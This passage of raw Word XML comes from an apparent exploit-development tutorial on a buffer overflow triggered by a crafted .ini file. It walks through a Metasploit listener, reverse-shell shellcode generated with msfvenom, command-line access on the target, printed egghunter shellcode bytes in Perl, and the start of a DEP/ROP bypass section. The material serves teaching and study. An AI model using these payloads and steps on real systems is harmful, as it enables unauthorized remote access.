      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A2930" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Ref71480422"/>
      <w:bookmarkStart w:id="47" w:name="_Toc71564053"/>
      <w:r>
        <w:t>Figure 17 - Show Options</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
    </w:p>
    <w:p w14:paraId="357B09E7" w14:textId="7C8B8EC0" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once these settings have been confirmed the “exploit” command can be used to set up the listener, as shown in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71480736 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 18 - Listener</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Hacking made easy with this POWERFULL tool, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C37B93C" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="550D6549" wp14:editId="7DF3797B">
            <wp:extent cx="5940360" cy="1019159"/>
            <wp:effectExtent l="0" t="0" r="3240" b="0"/>
            <wp:docPr id="26"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940360" cy="1019159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CA163B" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="48" w:name="_Ref71480736"/>
      <w:bookmarkStart w:id="49" w:name="_Toc71564054"/>
      <w:r>
        <w:t>Figure 18 - Listener</w:t>
      </w:r>
      <w:bookmarkEnd w:id="48"/>
      <w:bookmarkEnd w:id="49"/>
    </w:p>
    <w:p w14:paraId="33C38A56" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Now that the kali machine is listening for the connection, the next stage is to create the reverse shellcode.  The shellcode for this exploit can be generated using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, as seen in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71481521 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 19 - Reverse Shell Command</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The payload, however, is not the only component that needs to be set. Other components include the appropriate bad characters and the port that should be left open. The bad characters include the program specific characters discovered in the previous section, as well as general bad characters such as, “\x00, \x0a and \x0b, null bytes and new line bytes that would cause the shellcode to fail. The port chosen was 4444, as this is an unused port, however any unused port can be used </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the same port is used consistently throughout the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9EC1DB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00886D55" wp14:editId="0CD6FCEC">
            <wp:extent cx="5943600" cy="1238400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="27"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943600" cy="1238400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="387FECBD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Ref71481521"/>
      <w:bookmarkStart w:id="51" w:name="_Toc71564055"/>
      <w:r>
        <w:t>Figure 19 - Reverse Shell Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="1EA9E401" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This can then be substituted into the shellcode part of the generator code. This results in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>perl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file like the one found in Appendix A – </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71481772 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>ReverseShell.pl</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>. The resulting .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file that will be generated, as shown in Appendix B - </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71481798 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Reverseshell.ini</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, can be submitted to the application. This will not have a visual impact, however by looking at the Kali machine the success of the vulnerability can be verified by seeing that access has been gained to the command line, as seen in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71481836 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 20 - Command Line Access</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769CCFEE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB18F33" wp14:editId="6CCF75F9">
            <wp:extent cx="5943600" cy="951120"/>
            <wp:effectExtent l="0" t="0" r="0" b="1380"/>
            <wp:docPr id="28"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943600" cy="951120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1C7EE" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Ref71481836"/>
      <w:bookmarkStart w:id="53" w:name="_Toc71564056"/>
      <w:r>
        <w:t>Figure 20 - Command Line Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="08BFFA03" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc71564009"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EggHunter</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47E70501" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1891"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sometimes there is not enough space for code on the top of the stack. While this is not the case for this application it is important to understand how this can be circumvented using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code and how it can be implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B7CEE2" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The way </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code works is to input the shellcode in the junk area near the start of the stack. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> part involves code that looks for the shellcode within the junk area. This means that the EIP will be set based on the location of the code within the stack. This is done by having an identifier set at the start of the shellcode that the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code can search for. For this demonstration the shellcode will be injected after. However, this can easily be moved into the junk characters after it has successfully run once as proof of concept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A886D93" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> can again be used to generate the shellcode for this exploit. In this case the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code requires the use of the command shown in </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref71484227 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Figure 21 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Command</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">(A closer look to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>msf-egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, 2021).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE06016" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DEDBCDD" wp14:editId="547365FE">
            <wp:extent cx="5943600" cy="1340640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29"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943600" cy="1340640"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D33B56" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Ref71484227"/>
      <w:bookmarkStart w:id="56" w:name="_Toc71564057"/>
      <w:r>
        <w:t xml:space="preserve">Figure 21 - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Command</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="4297F1CA" w14:textId="6E5DE452" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>This results in the following code which can be used in conjunction with the previous payload and EIP setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2397EB" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>my $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2287E6E4" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x66\x81\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xca</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x0f\x42\x52\x6a\x02\x58\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xcd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x2e\x3c\x05</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52B18E78" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x5a\x74\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xb8\x59\x45\x45\x54\x89\xd7\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\x75\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xaf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>" .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00B3830A" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r>
        <w:t>"\x75\xe7\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\xe7</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>";</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01B6CA43" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7A2596" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As well as adding the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> code it will also be necessary to add extra NOPs to simulate the space which may be unavailable. Then, just before the shellcode is added, there needs to be a tag that identifies for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>egghunter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> where the shellcode starts. An example of this is included in </w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:instrText xml:space="preserve"> REF _Ref71485264 </w:instrText>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Figure 22 - Excerpt from Egghunter.pl</w:t>
      </w:r>
      <w:r w:rsidR="00C77908">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5500C823" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A1C96EA" wp14:editId="65D68072">
            <wp:extent cx="4896000" cy="181080"/>
            <wp:effectExtent l="0" t="0" r="0" b="9420"/>
            <wp:docPr id="30"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4896000" cy="181080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                      <a:prstDash/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0AD3BD" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="57" w:name="_Ref71485264"/>
      <w:bookmarkStart w:id="58" w:name="_Toc71564058"/>
      <w:r>
        <w:t>Figure 22 - Excerpt from Egghunter.pl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="57"/>
      <w:bookmarkEnd w:id="58"/>
    </w:p>
    <w:p w14:paraId="2C69B827" w14:textId="47FF99B5" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>This will result in a generator file like the one found in Appendix A – egghunter.pl. This will create an .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ini</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> file that when submitted to the program, will result in a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>messagebox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> popup. It will, however, take some time to load so give it around 10 seconds to verify if it has worked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECA7660" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc71564010"/>
      <w:r>
        <w:t>ROP</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="682C2248" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
      </w:pPr>
      <w:r>
        <w:t>It is unusual for modern programs to allow for the execution of code within the stack. Most modern operating systems use some method to prevent data being imputed to the application and executed. The most common method is Data Execution Prevention (DEP), which prevents the execution of code directly from the stack. This last stage of the tutorial will walk though how to circumvent these countermeasures.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9300" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9300"/>
      </w:tblGrid>
      <w:tr w:rsidR="00164B2A" w14:paraId="7A1E6861" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:left w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:bottom w:val="double" w:sz="24" w:space="0" w:color="000000"/>
              <w:right w:val="double" w:sz="24" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="002C0318" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:bookmarkStart w:id="60" w:name="_Hlk71146886"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Enable DEP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337F6884" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39D95DA8" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>For this step it is necessary to enable DEP. If you already have DEP enabled, then ignore this step.</w:t>
            </w:r>
            <w:bookmarkStart w:id="61" w:name="_Hlk71282646"/>
            <w:bookmarkEnd w:id="60"/>
            <w:bookmarkEnd w:id="61"/>
          </w:p>
          <w:p w14:paraId="62EAC5C1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00164B2A">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="63B16124" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="Standard"/>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>As shown in the diagram below there are 5 stages to enable DEP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26E88EBA" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="43"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Right click “My Computer” and select “Properties”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B83795" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Navigate to “Advanced”</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="303929F1" w14:textId="77777777" w:rsidR="00164B2A" w:rsidRDefault="00AD2FFF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
